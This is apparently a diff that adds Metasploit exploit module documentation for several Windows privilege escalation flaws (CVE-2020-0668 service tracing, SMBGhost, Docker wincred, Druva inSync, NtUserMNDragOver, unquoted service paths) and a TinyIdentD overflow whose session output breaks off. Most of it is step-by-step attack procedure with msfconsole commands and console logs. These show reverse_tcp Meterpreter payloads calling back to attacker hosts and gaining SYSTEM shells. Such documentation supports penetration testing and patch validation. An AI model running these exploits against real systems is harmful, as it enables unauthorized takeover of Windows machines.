+requires the use of the WindowsAPI through railgun.
+
+The Remote Access Service runs as system and creates a log of its
+actions called RASTAPI.LOG. Once the RASTAPI.LOG reaches a defined size,
+the Remote Access Service copies RASTAPI.LOG to RASTAPI.OLD in the same
+directory.
+The issue is twofold. First, the behavior of the Remote Access Service
+Tool API is defined by three registry keys:
+
+* HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI\EnableFileTracing
+* HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI\FileDirectory
+* HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI\new_size
+
+These three registry keys allow a user to turn on the RASTAPI and
+configure the size and location of the log file. These registry keys are
+writable by a regular user.
+
+The second issue is that the RAST service performs only a trivial check
+on the filesystem location of the RASTAPI.OLD destination. If an
+attacker creates a filesystem link between the old log destination
+(i.e. C:\users\user\temp\RASTAPI.OLD) and a trusted location
+(C:\windows\system32\badfile.dll), RASDIALER will copy the old log file
+to the linked location as the SYSTEM user. In this case, we write to
+C:\windows\system32\windowscoredeviceinfo.dll and then take advantage of
+a hijacking vulnerability in the System Orchestrator service.
+
+The attack looks something like:
+
+1. Gain lower-privileged access to a vulnerable target.
+1. Create a dummy directory to hold files.
+1. Mount the dummy directory to \RPC Control
+1. Upload a dll payload
+1. Create a link between \RPC Control\RASTAPI.LOG and the uploaded
+   payload
+1. Create a link between \RPC Control\RASTAPI.OLD and the destination
+   location the attacker would like to write (in this module,
+   C:\Windows\system32\WindowsCreDeviceInfo.dll)
+1. Write the registry keys to turn on FileTracing, set the file
+   directory to the dummy directory, and set the max file size to one
+   byte less than the size of the payload,
+1. Upload a configuration file for the rasdialer
+1. Launch the rasdialer. When RAST service kicks off, it tries to write
+   a log file to the directory specified in the registry, but it finds
+   one already exists, and it is already full, so RAST service then
+   copies the file to the “old” location that’s linked to the trusted
+   location. The result is an arbitrary file write to a trusted
+   location.
+1. At this point, the overwrite is complete and we launch a trigger
+   starting the System Orchestrator service which loads the overwritten
+   dll.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a session with basic privileges
+  3. Do: ```use exploit/windows/local/cve_2020_0668_service_tracing```
+  4. Do: ```set payload windows/x64/<payload>```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell running as SYSTEM after several minutes.
+
+## Options
+
+  **EXPLOIT_DIR**
+  Directory to use for file upload and linking; this should not already
+  exist.  The directory cannot be deleted until after a reboot.
+
+  **OVERWRITE_DLL**
+  Overwrite WindowsCreDeviceInfo.dll if it exists (false by default).
+  WindowsCoreDeviceInfo.dll is not present by default, but if it is
+  present, it is likely loaded, so even with this set to true, the
+  overwrite (and exploit) will fail.
+
+  **PAYLOAD_UPLOAD_NAME**
+  The filename to use for the payload binary (%RAND% by default).
+  This is the name of the dll payload when uploaded to the remote host.
+
+  **PHONEBOOK_UPLOAD_NAME**
+  The name of the phonebook file to trigger RASDIAL (%RAND% by default).
+  The rasdialer trigger requires a config file; this is the name of the
+  xml file required to trigger the RAST service.
+
+## Scenarios
+
+### Tested on Windows10 x64 Release 1803
+
+  ```
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0668_service_tracing 
+msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 192.168.135.168
+lhost => 192.168.135.168
+msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true
+verbose => true
+msf5 exploit(windows/local/cve_2020_0668_service_tracing) > set session 1
+session => 1
+msf5 exploit(windows/local/cve_2020_0668_service_tracing) > show options
+
+Module options (exploit/windows/local/cve_2020_0668_service_tracing):
+
+   Name                   Current Setting  Required  Description
+   ----                   ---------------  --------  -----------
+   EXPLOIT_DIR                             no        The directory to create for mounting (%TEMP%\%RAND% by default).
+   OVERWRITE_DLL          false            yes       Overwrite WindowsCreDeviceInfo.dll if it exists (false by default).
+   PAYLOAD_UPLOAD_NAME                     no        The filename to use for the payload binary (%RAND% by default).
+   PHONEBOOK_UPLOAD_NAME                   no        The name of the phonebook file to trigger RASDIAL (%RAND% by default).
+   SESSION                1                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Build Number = 17134
+[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
+[*] Payload DLL is 5120 bytes long
+[*] Registry hash = [{:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"EnableFileTracing", :value_type=>"REG_DWORD", :value_value=>1, :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"FileDirectory", :value_type=>"REG_EXPAND_SZ", :value_value=>"C:\\Users\\msfuser\\AppData\\Local\\Temp\\jeYpOx", :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"MaxFileSize", :value_type=>"REG_DWORD", :value_value=>5119, :delete_on_cleanup=>false}]
+[*] Making C:\Users\msfuser\AppData\Local\Temp\jeYpOx on DESKTOP-D1E425Q
+[*] Creating C:\Users\msfuser\AppData\Local\Temp\jeYpOx
+[*] Creating mountpoint
+[+] Successfuly opened C:\Users\msfuser\AppData\Local\Temp\jeYpOx
+[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FICNArio.dll
+[*] Payload md5 = b8341507939ea464f81f0245628e470f
+[*] Creating Symlinks
+[*] Creating symlink C:\Users\msfuser\AppData\Local\Temp\FICNArio.dll in \RPC Control\RASTAPI.LOG
+[*] Collected Symlink Handle 704
+[*] Creating symlink C:\Windows\system32\WindowsCoreDeviceInfo.dll in \RPC Control\RASTAPI.OLD
+[*] Collected Symlink Handle 688
+[*] Writing EnableFileTracing to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
+[*] Writing FileDirectory to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
+[*] Writing MaxFileSize to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
+[*] Uploading phonebook to DESKTOP-D1E425Q as C:\Users\msfuser\AppData\Local\Temp\TSvczqClZf.pbk from /home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2020-0668/phonebook.txt
+[*] Phonebook uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TSvczqClZf.pbk
+[*] Launching Rasdialer
+[*] Running Rasdialer with phonebook C:\Users\msfuser\AppData\Local\Temp\TSvczqClZf.pbk
+[*] Connecting to VPNTEST...
+
+Remote Access error 807 - The network connection between your computer and the VPN server was interrupted.  This can be caused by a problem in the VPN transmission and is commonly the result of internet latency or simply that your VPN server has reached capacity.  Please try to reconnect to the VPN server.  If this problem persists, contact the VPN administrator and analyze quality of network connectivity.
+
+For more help on this error:
+	Type 'hh netcfg.chm'
+	In help, click Troubleshooting, then Error Messages, then 807
+[*] Checking on C:\Windows\system32\WindowsCoreDeviceInfo.dll
+[*] Upload payload md5 = b8341507939ea464f81f0245628e470f
+[*] Moved payload md5 = b8341507939ea464f81f0245628e470f
+[*] Cleaning up before triggering dll load...
+[*] Removing Registry keys
+[*] Deleting EnableFileTracing from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
+[*] Deleting FileDirectory from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
+[*] Deleting MaxFileSize from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
+[*] Removing Symlinks
+[*] Closing symlink handle 704: The operation completed successfully.
+[*] Closing symlink handle 688: The operation completed successfully.
+[*] Removing Mountpoint
+[*] Removing directories
+[*] Trying to start notepad
+[*] Launching notepad to host the exploit...
+[+] Process 7416 launched.
+[*] Reflectively injecting the trigger DLL into 7416...
+[*] Trigger injected.
+[*] Trigger injected. Starting thread...
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+[!] Manual cleanup after reboot required for C:\Windows\system32\WindowsCoreDeviceInfo.dll and C:\Users\msfuser\AppData\Local\Temp\jeYpOx
+[*] Exploit complete.  It may take up to 10 minutes to get a session
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49680) at 2020-04-29 09:39:54 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

documentation/modules/exploit/windows/local/cve_2020_0796_smbghost.md

@@ -0,0 +1,102 @@
+## Vulnerable Application
+A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3)
+protocol that can be leveraged to execute code on a vulnerable server. This
+local exploit implementation leverages this flaw to elevate itself before
+injecting a payload into winlogon.exe.
+
+This vulnerability was patched in March 2020 but prior to that enough
+information was publicly available to trigger a crash which led to pre-patch
+workarounds. The official recommendation from [Microsoft][1] at the time was to
+disable SMBv3 compression, a feature which this exploit relies on. The module's
+check method will determine this value using the registry to identify whether or
+not compression has been disabled.
+
+Other recommendations included restricting access to TCP port 445 via firewalls.
+Given that this is a local exploit and the connection is made to the local host
+this is likely an ineffective measure against this particular implementation of
+the vulnerability.
+
+### Installation And Setup
+Windows 10 versions 1903 and 1909 (without the patch) are vulnerable out of the
+box. The default setting is to have SMBv3 compression enabled.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Get a Meterpreter session on a vulnerable host
+  1. Do: `use exploit/windows/local/cve_2020_0796_smbghost`
+  1. Set the `SESSION` and `PAYLOAD` options
+  1. Do: `run`
+  1. You should get a shell.
+
+## Scenarios
+
+### Windows 10 Version 1909 Build 18363.418 x64
+
+```
+msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-PKLKKF7\user
+meterpreter > sysinfo
+Computer        : DESKTOP-PKLKKF7
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 5
+Meterpreter     : x64/windows
+meterpreter > getsystem 
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background 
+[*] Backgrounding session 1...
+msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options 
+
+Module options (exploit/windows/local/cve_2020_0796_smbghost):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  -1               yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows 10 v1903-1909 x64
+
+
+msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Windows Build Number = 18363
+[+] The target appears to be vulnerable.
+[*] Launching notepad to host the exploit...
+[+] Process 4508 launched.
+[*] Reflectively injecting the exploit DLL into 4508...
+[*] Injecting exploit into 4508...
+[*] Exploit injected. Injecting payload into 4508...
+[*] Payload injected. Executing exploit...
+[*] Sending stage (206403 bytes) to 192.168.159.153
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
+
+[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005

documentation/modules/exploit/windows/local/docker_credential_wincred.md

@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+  Docker Desktop Community Edition before 2.1.0.1
+  https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe
+
+## Verification Steps
+
+  1. Install Docker Desktop Community Edition before 2.1.0.1
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/docker_credential_wincred```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. Using an administrator cmd shell on the target, run ```docker login```
+  8. You should get a shell you can elevate with ```getsystem```.
+
+## Scenarios
+
+### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803
+
+  ```
+msf5 exploit(windows/local/docker_credential_wincred) > show options
+
+Module options (exploit/windows/local/docker_credential_wincred):
+
+   Name         Current Setting                            Required  Description
+   ----         ---------------                            --------  -----------
+   PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
+   SESSION                                                 yes       The session to run this module on.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(windows/local/docker_credential_wincred) > set session 1
+session => 1
+msf5 exploit(windows/local/docker_credential_wincred) > check
+
+[*] Docker version 18.09.0, build 4d60db4
+[*] The target appears to be vulnerable.
+msf5 exploit(windows/local/docker_credential_wincred) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Docker version 18.09.0, build 4d60db4
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
+[*] Making Payload
+[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
+[*] Payload Upload Complete
+[*] Waiting for user to attempt to login
+[*] Sending stage (180291 bytes) to 192.168.132.125
+[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

documentation/modules/exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.md

@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+  Druva inSync client for Windows exposes a network service on TCP port
+  6064 on the local network interface. inSync versions 6.5.2 and prior
+  do not validate user-supplied program paths in RPC type 5 messages,
+  allowing execution of arbitrary commands as SYSTEM.
+
+  This module has been tested successfully on inSync version
+  6.5.2r99097 on Windows 7 SP1 (x64).
+
+  Download:
+
+  * https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *SYSTEM* session
+
+
+## Options
+
+  ### WritableDir
+
+  A writable directory file system path. (default: `%TEMP%`)
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+  ```
+  msf5 > use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc 
+  msf5 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Connecting to 127.0.0.1:6064 ...
+  [*] Sending packet (122 bytes) to 127.0.0.1:6064 ...
+  [*] Sending stage (176195 bytes) to 172.16.191.242
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49337) at 2020-04-30 22:01:05 -0400
+  
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo 
+  Computer        : TEST
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter > 
+  ```
+

documentation/modules/exploit/windows/local/ntusermndragover.md

@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+This module exploits a NULL pointer dereference vulnerability in 
+MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system 
+call.
+
+The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
+function does not effectively check the validity of the tagPOPUPMENU 
+objects it processes before passing them on to MNGetpItemFromIndex(), 
+where the NULL pointer dereference will occur.
+
+This module has been tested against Windows 7 x86 SP0 and SP1. 
+Offsets within the solution may need to be adjusted to work with 
+other versions of Windows, such as Windows Server 2008.
+
+## Verification Steps
+
+1. Get a non-SYSTEM meterpreter session on Windows 7 x86
+1. `use exploit/windows/local/ntusermndragover`
+1. `set session <session>`
+1. `set payload windows/meterpreter/reverse_tcp`
+1. `set LHOST <LHOST>`
+1. `set LPORT 5555`
+1. `exploit`
+1. Get a SYSTEM session
+
+## Scenarios
+
+### Windows 7 SP0 x86
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information             Connection
+  --  ----  ----                     -----------             ----------
+  1         meterpreter x86/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
+
+msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
+msf5 exploit(windows/local/ntusermndragover) > set session 1
+session => 1
+msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
+LPORT => 5555
+msf5 exploit(windows/local/ntusermndragover) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:5555
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Launching notepad.exe to host the exploit...
+[+] Process 3464 launched.
+[*] Injecting exploit into 3464 ...
+[*] Exploit injected. Injecting payload into 3464...
+[*] Payload injected. Executing exploit...
+[*] Sending stage (176195 bytes) to 192.168.56.15
+[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
+
+meterpreter > sysinfo
+Computer        : USER-PC
+OS              : Windows 7 (6.1 Build 7600).
+Architecture    : x86
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Windows 7 SP1 x86
+
+```
+
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information             Connection
+  --  ----  ----                     -----------             ----------
+  1         meterpreter x86/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
+
+msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
+msf5 exploit(windows/local/ntusermndragover) > set session 1
+session => 1
+msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
+LPORT => 5555
+msf5 exploit(windows/local/ntusermndragover) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:5555
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Launching notepad.exe to host the exploit...
+[+] Process 2696 launched.
+[*] Injecting exploit into 2696 ...
+[*] Exploit injected. Injecting payload into 2696...
+[*] Payload injected. Executing exploit...
+[*] Sending stage (176195 bytes) to 192.168.56.5
+[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
+
+meterpreter > sysinfo
+Computer        : USER-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```

documentation/modules/exploit/windows/local/unquoted_service_path.md

@@ -0,0 +1,161 @@
+## Vulnerable Application
+
+Commonly known as Trusted Service Path, or Unquoted Service path, this exploits a behavior of windows service.
+When a service calls an executable, a full path is given.  If the full path contains a space,
+Windows will attempt to execute a file up to the space, with `.exe` appended.
+If the executable isn't found, it keeps going until the full path or the next space (and repeat).
+
+@sumitvgithub had an excellent write-up on this
+[here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+
+As is documented in that write-up, if the executable is C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+
+Windows will attempt to run the following, in order.
+
+  1.  C:\Program.exe
+  2.  C:\Program Files\A.exe
+  3.  C:\Program Files\A Subfolder\B.exe
+  4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
+  5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+
+To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.
+In Win7+ the deeper folders are more likely to succeed based on default Windows permissions for users.
+
+Then, a service restart is required.  Often a user won't be able to do this,
+so the payload is left on disk as a reboot or service restart will trigger the payload to launch.
+
+The service will fail to start as long as the payload remains on disk.  Manual cleanup of the payload
+is required.
+
+### Creating a Vulnerable Service
+
+This is sourced from @sumitvgithub's write-up
+[here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+
+With an administrator command prompt, execute the following:
+
+```
+sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
+mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
+icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
+```
+
+This creates a vulnerable service, with `A Subfolder` being vulnerable to user writes.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a user shell
+  3. Do: ```use exploits/windows/local/unquoted_service_path```
+  4. Do: ```set session #```
+  5. Do: ```run```
+  6. You should either get a shell, or need to start a `multi/handler` and have the target restarted.
+
+## Options
+
+### QUICK
+
+If only the first service should attempt to be exploited, or all of them (sequentially).  Default is `true`
+
+## Scenarios
+
+### Windows 10 (16299) with Service Listed Above
+
+
+```
+[*] Using exploit/windows/local/unquoted_service_path
+resource (unquoted.rb)> setg verbose true
+verbose => true
+resource (unquoted.rb)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (unquoted.rb)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unquoted.rb)> setg lport 4444
+lport => 4444
+resource (unquoted.rb)> set session 1
+session => 1
+msf5 exploit(windows/local/unquoted_service_path) > 
+[*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49696) at 2020-04-10 14:41:32 -0400
+
+msf5 exploit(windows/local/unquoted_service_path) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(windows/local/unquoted_service_path) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Finding a vulnerable service...
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
+[+] Found vulnerable service: Some Vulnerable Service - C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe (LocalSystem)
+[*] Attempting exploitation of Some Vulnerable Service
+[*] Enumerating vulnerable paths
+[*] Checking writability to: C:\Program Files\A Subfolder\B Subfolder
+[-] Path not writable
+[*] Checking writability to: C:\Program Files\A Subfolder
+[+] Path is writable
+[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
+[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
+[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
+[+] Successfully wrote payload
+[*] Launching service Some Vulnerable Service...
+[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
+[-] [Some Vulnerable Service] Unhandled error: Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
+[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
+[*] Exploit completed, but no session was created.
+```
+
+Manually start a handler, and restart the service (via GUI) to launch the exploit
+
+```
+msf5 exploit(windows/local/unquoted_service_path) > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 4444
+[*] Payload handler running as background job 1.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf5 exploit(windows/local/unquoted_service_path) > [*] Sending stage (180291 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49708) at 2020-04-10 14:43:26 -0400
+
+msf5 exploit(windows/local/unquoted_service_path) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+The most important part!!!
+
+```
+meterpreter > rm "C:\\Program Files\\A Subfolder\\B.exe"
+
+```

documentation/modules/exploit/windows/misc/tiny_identd_overflow.md

@@ -0,0 +1,69 @@
+## Vulnerable Application
+
+  This module exploits a stack based buffer overflow in TinyIdentD
+  version 2.2.
+
+  If we send a long string to the ident service we can overwrite the
+  return address and execute arbitrary code. Credit to Maarten Boone.
+
+  Download:
+
+  * https://download.cnet.com/Tiny-IdentD/3000-2150_4-10147419.html
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/misc/tiny_identd_overflow`
+  3. `set RHOSTS <rhost>`
+  4. `set TARGET <target>`
+  5. `run`
+  6. You should get a new session
+
+
+## Options
+
+
+## Scenarios
+
+### TinyIdentD 2.2 on Windows XP SP0 - English (x86)
+
+  ```
+  msf5 > use exploit/windows/misc/tiny_identd_overflow
+  msf5 exploit(windows/misc/tiny_identd_overflow) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   Automatic
+     1   Windows 2000 Server SP4 - English
+     2   Windows 2000 Pro All - English
+     3   Windows 2000 Pro All - Italian
+     4   Windows 2000 Pro All - French
+     5   Windows XP SP0/1 - English
+     6   Windows XP SP2 - English
+     7   Windows XP SP2 - Italian
+
+
+  msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
+  target => 5
+  msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
+  rhosts => 172.16.191.140
+  msf5 exploit(windows/misc/tiny_identd_overflow) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
